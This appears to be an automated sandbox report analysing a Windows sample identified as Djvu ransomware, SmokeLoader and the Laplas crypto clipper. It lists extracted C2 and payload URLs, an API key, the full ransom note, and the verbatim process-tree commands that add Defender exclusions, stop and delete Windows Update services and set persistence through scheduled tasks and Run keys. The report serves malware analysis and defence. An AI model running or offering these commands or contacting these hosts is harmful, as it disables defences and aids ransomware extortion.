djvu | 2fa5adb1940605fdf9a3b39af904fe7cc2dba8d70039e1f96829a510242d71e2

max time kernel
121s
max time network
156s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
10-02-2023 13:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
Size

298KB
MD5

11511ba5fd4de1fc5051d0bcefb388ae
SHA1

5e9476f39df92e01d0952e703869e71f85d470cd
SHA256

79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a
SHA512

904f0e3a252cd0ef8108492de955ac520008b10b66da736cc4bbdc6a8c3736440a9a11edb73707ba415d7f3f4c2c590dfa983aca01864b9d66a6c3559ed744e9
SSDEEP

3072:0pb2LIT54Ga9Qzgp4gaCJrSjgBoMZmYKxQCBnIyCSyxzID1C7hZW0KIsiuNZ:xLIKGa96dfkBoMsDlqSwzIDM/KPP

Score

10^/10

djvu laplas smokeloader backdoor clipper discovery evasion persistence ransomware stealer trojan vmprotect

Malware Config

Extracted

Family

djvu

http://bihsy.com/lancer/get.php

Attributes

extension
.vvoo
offline_id
9c20OtJsXdFeF07b1IeFK5ERGv1zIb659YG380t1
payload_url
http://uaery.top/dl/build2.exe
http://bihsy.com/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-IiDRZpWuwI Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0645JOsie

rsa_pubkey.plain

Extracted

Family

laplas

http://45.159.189.105

Attributes

api_key
ad75d4e2e9636ca662a337b6e798d36159f23acfc89bbe9400d0d451bd8d69fd

Signatures

Detected Djvu ransomware 10 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1352-147-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1352-151-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1352-150-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1512-148-0x00000000023B0000-0x00000000024CB000-memory.dmp	family_djvu
behavioral2/memory/1352-153-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1352-160-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2992-164-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2992-166-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2992-167-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2992-180-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Detects Smokeloader packer 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5072-133-0x00000000021A0000-0x00000000021A9000-memory.dmp	family_smokeloader
behavioral2/memory/3808-195-0x00000000005D0000-0x00000000005D9000-memory.dmp	family_smokeloader

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Laplas Clipper
Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.
stealer clipper laplas
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2392 1664 rundll32.exe
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2392	1664	rundll32.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

XandETC.exe

description	pid	process	target process
PID 2632 created 2640	2632	XandETC.exe	Explorer.EXE
PID 2632 created 2640	2632	XandETC.exe	Explorer.EXE
PID 2632 created 2640	2632	XandETC.exe	Explorer.EXE
PID 2632 created 2640	2632	XandETC.exe	Explorer.EXE

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EEA9.exeliuj.exe514D.exe47E6.exe514D.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	EEA9.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	liuj.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	514D.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	47E6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	514D.exe

Executes dropped EXE 16 IoCs

Processes:

47E6.exe514D.exe514D.exe514D.exe514D.exesvcupdater.exeD350.exeEEA9.exellpb1133.exeliuj.exeXandETC.exeliuj.exeFDE.exe1463.exebuild3.exemstsca.exe

pid	process
748	47E6.exe
1512	514D.exe
1352	514D.exe
3360	514D.exe
2992	514D.exe
2264	svcupdater.exe
3808	D350.exe
4596	EEA9.exe
4076	llpb1133.exe
3788	liuj.exe
2632	XandETC.exe
1344	liuj.exe
5040	FDE.exe
3544	1463.exe
3392	build3.exe
2252	mstsca.exe

Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

2344 rundll32.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

4988 icacls.exe

pid	process
2344	rundll32.exe

pid	process
4988	icacls.exe

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\llpb1133.exe	vmprotect
C:\Users\Admin\AppData\Local\Temp\llpb1133.exe	vmprotect
behavioral2/memory/4076-194-0x0000000140000000-0x0000000140620000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

514D.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\0f2adf5a-61d4-49d7-a90b-1d77067772c5\\514D.exe\" --AutoStart"	514D.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

39 api.2ip.ua
40 api.2ip.ua
47 api.2ip.ua
Suspicious use of SetThreadContext 2 IoCs

Processes:

514D.exe514D.exe

description pid process target process

PID 1512 set thread context of 1352 1512 514D.exe 514D.exe
PID 3360 set thread context of 2992 3360 514D.exe 514D.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

3248 sc.exe
488 sc.exe
3520 sc.exe
3360 sc.exe
3872 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	ioc
39	api.2ip.ua
40	api.2ip.ua
47	api.2ip.ua

description	pid	process	target process
PID 1512 set thread context of 1352	1512	514D.exe	514D.exe
PID 3360 set thread context of 2992	3360	514D.exe	514D.exe

pid	process
3248	sc.exe
488	sc.exe
3520	sc.exe
3360	sc.exe
3872	sc.exe

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4112	748	WerFault.exe	47E6.exe
4516	5040	WerFault.exe	FDE.exe
4520	2344	WerFault.exe	rundll32.exe
4000	3544	WerFault.exe	1463.exe
4944	3164	WerFault.exe	EA61.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

D350.exe79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	D350.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	D350.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	D350.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4536 schtasks.exe
1868 schtasks.exe
2620 schtasks.exe

pid	process
4536	schtasks.exe
1868	schtasks.exe
2620	schtasks.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	57	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	58	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	59	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	60	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exeExplorer.EXE

pid	process
5072	79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
5072	79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE
2640	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

2640 Explorer.EXE
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exeD350.exe

pid process

5072 79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
3808 D350.exe

pid	process
2640	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 42 IoCs

Processes:

Explorer.EXEpowershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeShutdownPrivilege	2640	Explorer.EXE
Token: SeCreatePagefilePrivilege	2640	Explorer.EXE
Token: SeDebugPrivilege	3996	powershell.exe
Token: SeShutdownPrivilege	2432	powercfg.exe
Token: SeCreatePagefilePrivilege	2432	powercfg.exe
Token: SeDebugPrivilege	3512	powershell.exe
Token: SeShutdownPrivilege	3676	powercfg.exe
Token: SeCreatePagefilePrivilege	3676	powercfg.exe
Token: SeShutdownPrivilege	4364	powercfg.exe
Token: SeCreatePagefilePrivilege	4364	powercfg.exe
Token: SeShutdownPrivilege	3660	powercfg.exe
Token: SeCreatePagefilePrivilege	3660	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Explorer.EXE514D.exe47E6.exe514D.exe514D.exeEEA9.exeliuj.exe514D.exebuild3.exerundll32.exe

description	pid	process	target process
PID 2640 wrote to memory of 748	2640	Explorer.EXE	47E6.exe
PID 2640 wrote to memory of 748	2640	Explorer.EXE	47E6.exe
PID 2640 wrote to memory of 748	2640	Explorer.EXE	47E6.exe
PID 2640 wrote to memory of 1512	2640	Explorer.EXE	514D.exe
PID 2640 wrote to memory of 1512	2640	Explorer.EXE	514D.exe
PID 2640 wrote to memory of 1512	2640	Explorer.EXE	514D.exe
PID 1512 wrote to memory of 1352	1512	514D.exe	514D.exe
PID 1512 wrote to memory of 1352	1512	514D.exe	514D.exe
PID 1512 wrote to memory of 1352	1512	514D.exe	514D.exe
PID 1512 wrote to memory of 1352	1512	514D.exe	514D.exe
PID 1512 wrote to memory of 1352	1512	514D.exe	514D.exe
PID 1512 wrote to memory of 1352	1512	514D.exe	514D.exe
PID 1512 wrote to memory of 1352	1512	514D.exe	514D.exe
PID 1512 wrote to memory of 1352	1512	514D.exe	514D.exe
PID 1512 wrote to memory of 1352	1512	514D.exe	514D.exe
PID 1512 wrote to memory of 1352	1512	514D.exe	514D.exe
PID 748 wrote to memory of 1868	748	47E6.exe	schtasks.exe
PID 748 wrote to memory of 1868	748	47E6.exe	schtasks.exe
PID 748 wrote to memory of 1868	748	47E6.exe	schtasks.exe
PID 1352 wrote to memory of 4988	1352	514D.exe	icacls.exe
PID 1352 wrote to memory of 4988	1352	514D.exe	icacls.exe
PID 1352 wrote to memory of 4988	1352	514D.exe	icacls.exe
PID 1352 wrote to memory of 3360	1352	514D.exe	514D.exe
PID 1352 wrote to memory of 3360	1352	514D.exe	514D.exe
PID 1352 wrote to memory of 3360	1352	514D.exe	514D.exe
PID 3360 wrote to memory of 2992	3360	514D.exe	514D.exe
PID 3360 wrote to memory of 2992	3360	514D.exe	514D.exe
PID 3360 wrote to memory of 2992	3360	514D.exe	514D.exe
PID 3360 wrote to memory of 2992	3360	514D.exe	514D.exe
PID 3360 wrote to memory of 2992	3360	514D.exe	514D.exe
PID 3360 wrote to memory of 2992	3360	514D.exe	514D.exe
PID 3360 wrote to memory of 2992	3360	514D.exe	514D.exe
PID 3360 wrote to memory of 2992	3360	514D.exe	514D.exe
PID 3360 wrote to memory of 2992	3360	514D.exe	514D.exe
PID 3360 wrote to memory of 2992	3360	514D.exe	514D.exe
PID 2640 wrote to memory of 3808	2640	Explorer.EXE	D350.exe
PID 2640 wrote to memory of 3808	2640	Explorer.EXE	D350.exe
PID 2640 wrote to memory of 3808	2640	Explorer.EXE	D350.exe
PID 2640 wrote to memory of 4596	2640	Explorer.EXE	EEA9.exe
PID 2640 wrote to memory of 4596	2640	Explorer.EXE	EEA9.exe
PID 2640 wrote to memory of 4596	2640	Explorer.EXE	EEA9.exe
PID 4596 wrote to memory of 4076	4596	EEA9.exe	llpb1133.exe
PID 4596 wrote to memory of 4076	4596	EEA9.exe	llpb1133.exe
PID 4596 wrote to memory of 3788	4596	EEA9.exe	liuj.exe
PID 4596 wrote to memory of 3788	4596	EEA9.exe	liuj.exe
PID 4596 wrote to memory of 3788	4596	EEA9.exe	liuj.exe
PID 4596 wrote to memory of 2632	4596	EEA9.exe	XandETC.exe
PID 4596 wrote to memory of 2632	4596	EEA9.exe	XandETC.exe
PID 3788 wrote to memory of 1344	3788	liuj.exe	liuj.exe
PID 3788 wrote to memory of 1344	3788	liuj.exe	liuj.exe
PID 3788 wrote to memory of 1344	3788	liuj.exe	liuj.exe
PID 2640 wrote to memory of 5040	2640	Explorer.EXE	FDE.exe
PID 2640 wrote to memory of 5040	2640	Explorer.EXE	FDE.exe
PID 2640 wrote to memory of 5040	2640	Explorer.EXE	FDE.exe
PID 2640 wrote to memory of 3544	2640	Explorer.EXE	1463.exe
PID 2640 wrote to memory of 3544	2640	Explorer.EXE	1463.exe
PID 2640 wrote to memory of 3544	2640	Explorer.EXE	1463.exe
PID 2992 wrote to memory of 3392	2992	514D.exe	build3.exe
PID 2992 wrote to memory of 3392	2992	514D.exe	build3.exe
PID 2992 wrote to memory of 3392	2992	514D.exe	build3.exe
PID 3392 wrote to memory of 2620	3392	build3.exe	schtasks.exe
PID 3392 wrote to memory of 2620	3392	build3.exe	schtasks.exe
PID 3392 wrote to memory of 2620	3392	build3.exe	schtasks.exe
PID 2392 wrote to memory of 2344	2392	rundll32.exe	rundll32.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2640

C:\Users\Admin\AppData\Local\Temp\79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe
"C:\Users\Admin\AppData\Local\Temp\79fe08c83e8f2f3679c3dfdcff6698b92489fa915ccfb3c3458827861034814a.exe"
2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5072

C:\Users\Admin\AppData\Local\Temp\47E6.exe
C:\Users\Admin\AppData\Local\Temp\47E6.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:748

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
3⤵
- Creates scheduled task(s)
PID:1868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 748 -s 692
3⤵
- Program crash
PID:4112

C:\Users\Admin\AppData\Local\Temp\514D.exe
C:\Users\Admin\AppData\Local\Temp\514D.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1512

C:\Users\Admin\AppData\Local\Temp\514D.exe
C:\Users\Admin\AppData\Local\Temp\514D.exe
3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\0f2adf5a-61d4-49d7-a90b-1d77067772c5" /deny *S-1-1-0:(OI)(CI)(DE,DC)
4⤵
- Modifies file permissions
PID:4988

C:\Users\Admin\AppData\Local\Temp\514D.exe
"C:\Users\Admin\AppData\Local\Temp\514D.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3360

C:\Users\Admin\AppData\Local\Temp\514D.exe
"C:\Users\Admin\AppData\Local\Temp\514D.exe" --Admin IsNotAutoStart IsNotTask
5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2992

C:\Users\Admin\AppData\Local\78a31bba-c895-4f6d-aeac-fb4972566605\build3.exe
"C:\Users\Admin\AppData\Local\78a31bba-c895-4f6d-aeac-fb4972566605\build3.exe"
6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3392

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
7⤵
- Creates scheduled task(s)
PID:2620

C:\Users\Admin\AppData\Local\Temp\D350.exe
C:\Users\Admin\AppData\Local\Temp\D350.exe
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3808

C:\Users\Admin\AppData\Local\Temp\EEA9.exe
C:\Users\Admin\AppData\Local\Temp\EEA9.exe
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4596

C:\Users\Admin\AppData\Local\Temp\llpb1133.exe
"C:\Users\Admin\AppData\Local\Temp\llpb1133.exe"
3⤵
- Executes dropped EXE
PID:4076

C:\Users\Admin\AppData\Local\Temp\liuj.exe
"C:\Users\Admin\AppData\Local\Temp\liuj.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3788

C:\Users\Admin\AppData\Local\Temp\liuj.exe
"C:\Users\Admin\AppData\Local\Temp\liuj.exe" -h
4⤵
- Executes dropped EXE
PID:1344

C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:2632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
4⤵
PID:2856

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
5⤵
PID:2776

C:\Users\Admin\AppData\Local\Temp\FDE.exe
C:\Users\Admin\AppData\Local\Temp\FDE.exe
2⤵
- Executes dropped EXE
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5040 -s 812
3⤵
- Program crash
PID:4516

C:\Users\Admin\AppData\Local\Temp\1463.exe
C:\Users\Admin\AppData\Local\Temp\1463.exe
2⤵
- Executes dropped EXE
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 764
3⤵
- Program crash
PID:4000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3996

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:640

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:3248

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:488

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:3520

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:3360

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:2960

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:3872

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:2172

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:3644

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:4192

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:4792

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:928

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2432

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3676

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3660

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3512

C:\Users\Admin\AppData\Local\Temp\EA61.exe
C:\Users\Admin\AppData\Local\Temp\EA61.exe
2⤵
PID:3164

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Dfsoeq.dll,start
3⤵
PID:1088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 704
3⤵
- Program crash
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 748 -ip 748
1⤵
PID:3540

